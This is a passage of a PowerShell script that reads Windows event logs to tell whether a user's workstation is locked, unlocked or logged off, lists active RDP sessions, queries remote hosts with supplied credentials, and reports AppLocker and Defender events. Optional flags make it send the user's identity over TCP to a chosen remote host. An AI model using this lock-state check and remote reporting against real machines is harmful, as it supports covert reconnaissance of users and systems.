1454 | #Get domain form 4779 event, if event is null then get domain from wmi 1455 | if($getLast4779.Domain) 1456 | { 1457 | $domainName=$getLast4779.Domain 1458 | } 1459 | else 1460 | { 1461 | $domainName=(Get-WmiObject Win32_ComputerSystem).Domain 1462 | } 1463 | 1464 | $tmpTime = $t4768-$t4779 1465 | $tmpTime2 = $t4768 - $t4800 1466 | 1467 | 1468 | 1469 | 1470 | if($tmpTime.TotalMilliseconds) 1471 | { 1472 | $p=$tmpTime.TotalMilliseconds 1473 | } 1474 | else 1475 | { 1476 | $p=0 1477 | } 1478 | 1479 | if($tmpTime2.TotalMilliseconds) 1480 | { 1481 | $k=$tmpTime2.TotalMilliseconds 1482 | } 1483 | else 1484 | { 1485 | $k=0 1486 | } 1487 | 1488 | 1489 | if(($p -ge 0) -and ($k -ge 0)) 1490 | { 1491 | 1492 | Write-Host "[-] The workstation is unlocked | User $domainName\$currentUser is in!" -ForegroundColor Yellow 1493 | Write-Output "`n" 1494 | } 1495 | else 1496 | { 1497 | Write-Host "[+] The workstation is locked | User $domainName\$currentUser is NOT in!" -ForegroundColor Green 1498 | if(($using:reverseHost -and $using:reversePort) -ne "") 1499 | { 1500 | Invoke-Command -ScriptBlock { 1501 | 1502 | 1503 | $whoami=whoami 1504 | $TcpClient = New-Object System.Net.Sockets.TcpClient 1505 | try 1506 | { 1507 | $Tcpclient.Connect($using:reverseHost,$using:reversePort) 1508 | $t=$Tcpclient.GetStream() 1509 | $data=[System.Text.Encoding]::ASCII.GetBytes($whoami) 1510 | $t.Write($data,0,$data.length) 1511 | 1512 | } 1513 | catch 1514 | { 1515 | Write-Host "No connection could be made with $using:reverseHost on port $using:reversePort" 1516 | } 1517 | 1518 | } 1519 | 1520 | } 1521 | else 1522 | { 1523 | Write-Host "[!] You can provide -reverseHost and -reversePort flags to send the results to the server!" -ForegroundColor Yellow 1524 | Write-Output "`n" 1525 | } 1526 | 1527 | 1528 | 1529 | } 1530 | 1531 | 1532 | <#$sessionConnected=Get-EventLog -LogName Security -Instanceid 4778 -newest 1 | Where {$_.message -match "Account Name:\s*"} 1533 | $sessionConnectedUsername=(Get-EventLog -LogName Security -Instanceid 4778 -newest 1 | Where {$_.message -match "Account Name:\s*"} | Select -property MachineName,@{Name="Username";Expression={$_.ReplacementStrings[0]}}).Username 1534 | $sessionConnectedMachine=(Get-EventLog -LogName Security -Instanceid 4778 -newest 1 | Where {$_.message -match "Account Name:\s*"} | Select -property MachineName).MachineName 1535 | Write-Host "[+] User $sessionDisconnectedMachine\$sessionDisconnectedUsername disconnected from his terminal at"$sessionDisconnected.TimeGenerated"and connected as $sessionConnectedMachine\$sessionConnectedUsername at"$sessionConnected.TimeGenerated -ForegroundColor Green#> 1536 | }#6 1537 | 1538 | 1539 | 1540 | } 1541 | else 1542 | { 1543 | #write-Host "[+] The screen saver is invoked -"$eventArray[$x]"/"($eventArray[$x]+1)"event IDs" -ForegroundColor Green 1544 | #write-Host "[+] The workstation is locked / The screen saver is invoked" -ForegroundColor Green 1545 | <#SCREEN SAVER OUTPUT / NOTHING HERE AS OUTPUT#> 1546 | 1547 | 666666 1548 | 1549 | }#5 1550 | 1551 | 1552 | } 1553 | else 1554 | { 1555 | <# NOTHING HERE #> 1556 | }#4 1557 | ##################################################################################################################################################################### 1558 | 1559 | }#3.5 1560 | 1561 | } 1562 | else 1563 | { 1564 | 1565 | Write-Host "[+] User $domainName\$currentUser is logged off" -ForegroundColor Green 1566 | 1567 | if(($using:reverseHost -and $using:reversePort) -ne "") 1568 | { 1569 | Invoke-Command -ScriptBlock { 1570 | 1571 | 1572 | $whoami="$domainName\$currentUser" 1573 | $TcpClient = New-Object System.Net.Sockets.TcpClient 1574 | try 1575 | { 1576 | $Tcpclient.Connect($using:reverseHost,$using:reversePort) 1577 | $t=$Tcpclient.GetStream() 1578 | $data=[System.Text.Encoding]::ASCII.GetBytes($whoami) 1579 | $t.Write($data,0,$data.length) 1580 | 1581 | } 1582 | catch 1583 | { 1584 | Write-Host "No connection could be made with $using:reverseHost on port $using:reversePort" 1585 | } 1586 | 1587 | } 1588 | 1589 | } 1590 | else 1591 | { 1592 | Write-Host "[!] You can provide -reverseHost and -reversePort flags to send the results to the server!" -ForegroundColor Yellow 1593 | Write-Output "`n" 1594 | } 1595 | 1596 | 1597 | }#3 1598 | 1599 | 1600 | 1601 | } 1602 | else 1603 | { 1604 | <# Nothing Here#> 1605 | 1606 | }#2 1607 | 1608 | 1609 | }#End For 1610 | 1611 | 1612 | 1613 | } 1614 | 1615 | 1616 | function RDPConn($ip) 1617 | { 1618 | if($ip -eq "127.0.0.1") 1619 | { 1620 | Invoke-Command -ScriptBlock ${function:RDPCore} 1621 | 1622 | 1623 | } 1624 | else 1625 | { 1626 | #Get all winRM connections 1627 | $winrmUniqueSessions=Get-PSSession | Get-Unique 1628 | if($winrmUniqueSessions) 1629 | { 1630 | for($x=0;$x -le ($winrmUniqueSessions).length;$x++) 1631 | { 1632 | if($winrmUniqueSessions[$x]) 1633 | { 1634 | 1635 | #Check for active RDP connections using WinRM 1636 | Invoke-Command -Session (Get-PSSession -Id $winrmUniqueSessions[$x].id) -ScriptBlock ${function:RDPCore} 1637 | 1638 | 1639 | } 1640 | 1641 | } 1642 | } 1643 | else 1644 | { 1645 | Write-Host "[!] No WinRM Session found" -ForegroundColor Red 1646 | } 1647 | 1648 | } 1649 | 1650 | } 1651 | 1652 | function RDPCore 1653 | { 1654 | 1655 | 1656 | #Datetime for logs, 2 days before 1657 | $twodaysBefore=Get-date -date $(get-date).adddays(-2) 1658 | 1659 | #Get today's events - 1149 1660 | $AuthSucceded=Get-WinEvent "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 1149)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,MachineName,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Source IP";Expression={$_.Properties[2].value}} 1661 | 1662 | #Get today's events - 25, for all users/sessions ids 1663 | $rdpSessionReconn=Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 25)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}}# | where {$_."Source IP" -notmatch "LOCAL"} 1664 | #Group todays event - 25 by sessionID to avoid double records 1665 | $grouprdpSessionReconn=(Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 25)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}}<#| where {$_."Source IP" -notmatch "LOCAL"}#>| Group-Object {$_."Session ID"}) 1666 | #Create empty array to add last "Reconnected sessions" for every session ID 1667 | $rdpSessionLastReconn = New-Object System.Collections.ArrayList 1668 | #Add dummy line to bypass the problem with 1 entry 1669 | #$rdpSessionLastRecon.Add("") | Out-Null 1670 | #check if the length is only 1 1671 | if($grouprdpSessionReconn.count -eq 1) 1672 | { 1673 | 1674 | $rdpSessionLastReconn.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 25)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,MachineName,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}} <#| where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $grouprdpSessionReconn.Name)} | select-object -first 1)) | Out-Null 1675 | 1676 | } 1677 | else 1678 | { 1679 | #Find the latest session for all unique sessionIDs, event - 25 - More than 1 session 1680 | for($x=0;$x -lt $grouprdpSessionReconn.length;$x++) 1681 | { 1682 | 1683 | $rdpSessionLastReconn.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 25)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,MachineName,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}} <#| where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $grouprdpSessionReconn[$x].Name)} | select-object -first 1)) | Out-Null 1684 | } 1685 | 1686 | } 1687 | 1688 | 1689 | 1690 | 1691 | #Get today's events - 24, for all users/sessions ids 1692 | $rdpUserDisc=Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 24)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Source IP";Expression={$_.Properties[2].value}},@{Name="Session ID";Expression={$_.Properties[1].value}}# | where {$_."Source IP" -notmatch "LOCAL"} 1693 | #Group todays event - 24 by sessionID to avoid double records 1694 | $grouprdpUserDisc=(Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 24)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Source IP";Expression={$_.Properties[2].value}},@{Name="Session ID";Expression={$_.Properties[1].value}} <#| where {$_."Source IP" -notmatch "LOCAL"}#> | Group-Object {$_."Session ID"}) 1695 | #Create empty aray to add last "Disconnected Sessions" for every session ID 1696 | $rdpSessionLastDisc = New-Object System.Collections.ArrayList 1697 | #Add dummy line to bypass the problem with 1 entry 1698 | 1699 | #check if the length is 1 1700 | if($grouprdpUserDisc.count -eq 1) 1701 | { 1702 | #$rdpSessionLastDisc.Add("") | Out-Null 1703 | $rdpSessionLastDisc.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 24)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}} <#| where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $grouprdpUserDisc.Name)} | select-object -first 1)) | Out-Null 1704 | 1705 | } 1706 | else 1707 | { 1708 | #Find the latest session for all unique session IDs, event - 24 - More than session 1709 | for($x=0;$x -lt $grouprdpUserDisc.length;$x++) 1710 | { 1711 | $rdpSessionLastDisc.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 24)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}} <#| where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $grouprdpUserDisc[$x].Name)} | select-object -first 1)) | Out-Null 1712 | } 1713 | } 1714 | 1715 | 1716 | 1717 | #Get today's events - 21, for all users/sessions ids 1718 | $rdpSessLogonSucc=Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 21)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Source IP";Expression={$_.Properties[2].value}},@{Name="Session ID";Expression={$_.Properties[1].value}}# | where {$_."Source IP" -notmatch "LOCAL"} 1719 | #Group todays event - 21 by sessionID to avoid double records 1720 | $grouprdpSessLogonSucc=(Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 21)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Source IP";Expression={$_.Properties[2].value}},@{Name="Session ID";Expression={$_.Properties[1].value}}<# | where {$_."Source IP" -notmatch "LOCAL"}#> | Group-Object {$_."Session ID"}) 1721 | #Create empty aray to add last "Disconnected Sessions" for every session ID 1722 | $rdpSessLastSucc = New-Object System.Collections.ArrayList 1723 | #Add dummy line into the table to bypass the problem with 1 entry 1724 | #$grouprdpSessLogonSucc.length 1725 | #check if the length of grouped sessions is only 1 1726 | if($grouprdpSessLogonSucc.count -eq 1) 1727 | { 1728 | 1729 | #$rdpSessLastSucc.add("") | Out-Null 1730 | $rdpSessLastSucc.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 21)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}}<# | where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $grouprdpSessLogonSucc.Name)} | select-object -first 1)) | Out-Null 1731 | } 1732 | else 1733 | { 1734 | 1735 | #Expand Group-Object 1736 | $expandGrouprdpSessLogonSucc=$grouprdpSessLogonSucc | select-object -Expand Group 1737 | #$expandGrouprdpSessLogonSucc.length 1738 | #Find the latest session for all unique session IDs, event - 21 - More than 1 session 1739 | for($x=0;$x -lt $expandGrouprdpSessLogonSucc.length;$x++) 1740 | { 1741 | 1742 | $rdpSessLastSucc.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 21)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}}<# | where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $expandGrouprdpSessLogonSucc[$x]."Session ID")} | select-object -first 1)) | Out-Null 1743 | 1744 | } 1745 | } 1746 | 1747 | 1748 | $tmp=$rdpSessLastSucc 1749 | $rdpALLSessArray = New-Object System.Collections.ArrayList 1750 | 1751 | 1752 | Write-Output "`n" 1753 | Write-Output "Active RDP Sessions" 1754 | Write-Output "`n" 1755 | #table with active RDP sessions 1756 | 1757 | for($x=0;$x -le $rdpSessionLastReconn.count;$x++) 1758 | { 1759 | 1760 | for($y=0;$y -le $rdpSessionLastDisc.count;$y++) 1761 | { 1762 | 1763 | for($n=0;$n -le $rdpSessLastSucc.count;$n++) 1764 | { 1765 | 1766 | 1767 | #if event id 21 found and disconnection event id 24 is null then a workstation is connected 1768 | #if($rdpSessLastSucc[$n]."Session ID" -eq $rdpSessionLastDisc[$y]."Session ID") 1769 | if($rdpSessionLastDisc) 1770 | {#1 1771 | 1772 | #if event 21 exists, successful logon 1773 | if($tmp[$n]) 1774 | { 1775 | if($tmp[$n]."Session ID" -eq $rdpSessionLastDisc[$y]."Session ID") 1776 | { 1777 | $totalRDPSession=$rdpSessionLastDisc[$y].TimeCreated-$tmp[$n].TimeCreated 1778 | 1779 | 1780 | if($totalRDPSession.TotalMilliseconds -lt 0) 1781 | { 1782 | 1783 | #Write-Host "[+] " -foregroundColor Green -NoNewline;Write-Host "RDP Session"$rdpSessLastSucc[$n]."Session ID" "| User"$rdpSessLastSucc[$n].username"|"$rdpSessLastSucc[$n]."Source IP" "->"$rdpSessLastSucc[$n].MachineName"@"$rdpSessLastSucc[$n].Timecreated 1784 | $rdpALLSessArray.Add($tmp[$n]) | Out-Null 1785 | 1786 | } 1787 | } 1788 | } 1789 | else 1790 | { 1791 | 1792 | #if event id 25 exists, reconnection 1793 | if($rdpSessionLastReconn[$x]) 1794 | { 1795 | if($rdpSessionLastDisc[$y]."Session ID" -eq $rdpSessionLastReconn[$x]."Session ID") 1796 | { 1797 | 1798 | $totalRDPSession=$rdpSessionLastDisc[$y].TimeCreated-$rdpSessionLastReconn[$x].TimeCreated 1799 | if($totalRDPSession.TotalMilliseconds -lt 0) 1800 | { 1801 | 1802 | #Write-Host "[+] " -foregroundColor Green -NoNewline;Write-Host "RDP Session"$rdpSessionLastReconn[$x]."Session ID" "| User"$rdpSessionLastReconn[$x].username"|"$rdpSessionLastReconn[$x]."Source IP" "->"$rdpSessionLastReconn[$x].MachineName"@"$rdpSessionLastReconn[$x].Timecreated 1803 | $rdpALLSessArray.Add($rdpSessionLastReconn[$x]) | Out-Null 1804 | } 1805 | 1806 | } 1807 | } 1808 | 1809 | } 1810 | 1811 | } 1812 | else 1813 | { 1814 | 1815 | 1816 | $totalRDPSession=$tmp[$n].TimeCreated 1817 | if($totalRDPSession.TotalMilliseconds -lt 0) 1818 | { 1819 | $rdpALLSessArray.Add($tmp[$n]) | Out-Null 1820 | } 1821 | 1822 | 1823 | }#1 1824 | 1825 | } 1826 | 1827 | 1828 | } 1829 | } 1830 | 1831 | 1832 | $finalRDP=$rdpALLSessArray | sort-object -Property "Session Id" -Unique 1833 | 1834 | 1835 | if($finalRDP.count -lt 1) 1836 | { 1837 | if($finalRDP -and ($finalRDP."Source IP" -notmatch "LOCAL")) 1838 | { 1839 | 1840 | Write-Host "[+] " -foregroundColor Green -NoNewline;Write-Host "RDP Session"$finalRDP."Session ID" "| User"$finalRDP.username"| Source IP:"$finalRDP."Source IP" "|"$finalRDP.Timecreated 1841 | } 1842 | else 1843 | { 1844 | Write-Host "[-] "-ForegroundColor Red -NoNewline;Write-Host "No active RDP connections" 1845 | } 1846 | } 1847 | else 1848 | { 1849 | 1850 | for($x=0; $x -lt $finalRDP.count;$x++) 1851 | { 1852 | if($finalRDP[$x]."Source IP" -notmatch "LOCAL") 1853 | { 1854 | Write-Host "[+] " -foregroundColor Green -NoNewline;Write-Host "RDP Session"$finalRDP[$x]."Session ID" "| User"$finalRDP[$x].username"| Source IP:"$finalRDP[$x]."Source IP" "|"$finalRDP[$x].Timecreated 1855 | } 1856 | } 1857 | 1858 | } 1859 | 1860 | 1861 | 1862 | } 1863 | 1864 | 1865 | #https://powershell.org/forums/topic/runas-command-to-run-a-script-under-alternate-user-credentials/ 1866 | function RunAS($user,$pass,$ip,$eventID,$newest,$users) 1867 | { 1868 | 1869 | $PasswordSS = ConvertTo-SecureString -String $pass -AsPlainText -Force 1870 | $Creds = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $user,$PasswordSS 1871 | if(($newest -eq '') -or !$newest) 1872 | { 1873 | $newest = 100 #RunAs $newest default value 1874 | Invoke-Command -ComputerName $ip -Credential $Creds -ScriptBlock ${function:logQuery} -ArgumentList $eventID,$newest,$users 1875 | } 1876 | else 1877 | { 1878 | Invoke-Command -ComputerName $ip -Credential $Creds -ScriptBlock ${function:logQuery} -ArgumentList $eventID,$newest,$users 1879 | } 1880 | } 1881 | 1882 | 1883 | function Get-FinePasswordPolicy 1884 | { 1885 | 1886 | Import-Module ActiveDirectory 1887 | Get-ADFineGrainedPasswordPolicy -Filter { name -like '*' } 1888 | 1889 | } 1890 | 1891 | function ApplockerLogs 1892 | { 1893 | [CmdletBinding()] 1894 | Param([string]$eventID,[datetime]$LogCreatedDate) 1895 | 1896 | 1897 | 1898 | if($eventID -eq "8004") 1899 | { 1900 | try 1901 | { 1902 | $eventID8004=Get-winEvent -Logname "Microsoft-Windows-applocker/EXE and DLL" -ErrorAction Stop | Select TimeCreated,ProviderName,id,Message,UserID | Where-Object {$_.id -eq $eventID} 1903 | if((!$LogCreatedDate) -and (($eventID8004).Count -gt 0)) 1904 | { 1905 | Write-Host "[+] Applocker event (8004) - *.exe, *.com, *.dll, *.ocx" 1906 | $eventID8004 1907 | 1908 | } 1909 | else 1910 | { 1911 | Write-Host "[+] Applocker event (8004) - *.exe, *.com, *.dll, *.ocx" 1912 | $eventID8004 | where-object {($_.TimeCreated).date -eq $LogCreatedDate} 1913 | } 1914 | } 1915 | catch 1916 | { 1917 | Write-Output "[-] No logs - Applocker event (8004)" 1918 | } 1919 | } 1920 | else 1921 | { 1922 | 1923 | try 1924 | { 1925 | $eventID8007=Get-winEvent -Logname "Microsoft-Windows-applocker/MSI and Script" -ErrorAction Stop | Select TimeCreated,ProviderName,id,Message,UserID | Where-Object {$_.id -eq "$eventID"} 1926 | if((!$LogCreatedDate) -and (($eventID8007).Count -gt 0)) 1927 | { 1928 | Write-Host "[+] Applocker event (8007) - *.js, *.ps1, *.vbs, *.cmd, *.bat, *.si, *.msp" 1929 | $eventID8007 1930 | } 1931 | else 1932 | { 1933 | Write-Host "[+] Applocker event (8007) - *.js, *.ps1, *.vbs, *.cmd, *.bat, *.si, *.msp" 1934 | $eventID8007 | where-object {($_.TimeCreated).date -eq $LogCreatedDate} 1935 | } 1936 | 1937 | } 1938 | catch 1939 | { 1940 | Write-Output "[-] No logs - Applocker (8007)" 1941 | } 1942 | } 1943 | } 1944 | 1945 | function WindowsDefender 1946 | { 1947 | $mpTD=Get-MpThreatDetection | Select ActionSuccess,AMProductVersion,InitialDetectionTime,ProcessName,RemediationTime,ThreatID,DomainUser 1948 | $mpT=Get-MPThreat | Select DidThreatExecute,Resources,ThreatID,ThreatName,SeverityID,PSComputerName 1949 | $group_mpTD=$mpTD | Group-Object -Property ThreatID 1950 | 1951 | $group_mpTD_sort=$group_mpTD.Name | Sort-Object 1952 | $mpT_sort=$mpT.ThreatID | Sort-Object 1953 | 1954 | for($i=0; $i -lt $mpT_sort.count;$i++) 1955 | { 1956 | if($group_mpTD_sort[$i] -eq $mpT_sort[$i]) 1957 | { 1958 | $threatDetection=$mpTD | where-object {$_.ThreatID -eq $group_mpTD_sort[$i]} 1959 | $threat=$mpT | where-object {$_.ThreatID -eq $group_mpTD_sort[$i]} 1960 | 1961 | Write-Host "Action Success: "$threatDetection.ActionSuccess 1962 | Write-Host "AMProductVersion: "$threatDetection.AMProductVersion 1963 | Write-Host "InitialDetectionTime: "$threatDetection.InitialDetectionTime 1964 | Write-Host "ProcessName: "$threatDetection.ProcessName 1965 | Write-Host "RemediationTime: "$threatDetection.RemediationTime 1966 | Write-Host "DidThreatExecute: "$threat.DidThreatExecute 1967 | Write-Host "DomainUser: "$threatDetection.DomainUser 1968 | Write-Host "Resources: "$threat.Resources 1969 | Write-Host "ThreatName: "$threat.ThreatName 1970 | Write-Host "Severity: "$threat.SeverityID 1971 | Write-Host "ThreatID: "$threat.ThreatID 1972 | Write-Output "`n" 1973 | } 1974 | 1975 | } 1976 | 1977 | } 1978 | 1979 | #Create Functions 1980 | 1981 | #Get ObjectGUID 1982 | #Example->Get-ADObject -Identity D4429A86-CE1E-48E3-8CFF-E391397DA168 1983 | 1984 | #Translate Security Descruptitor to Human visible 1985 | --------------------------------------------------------------------------------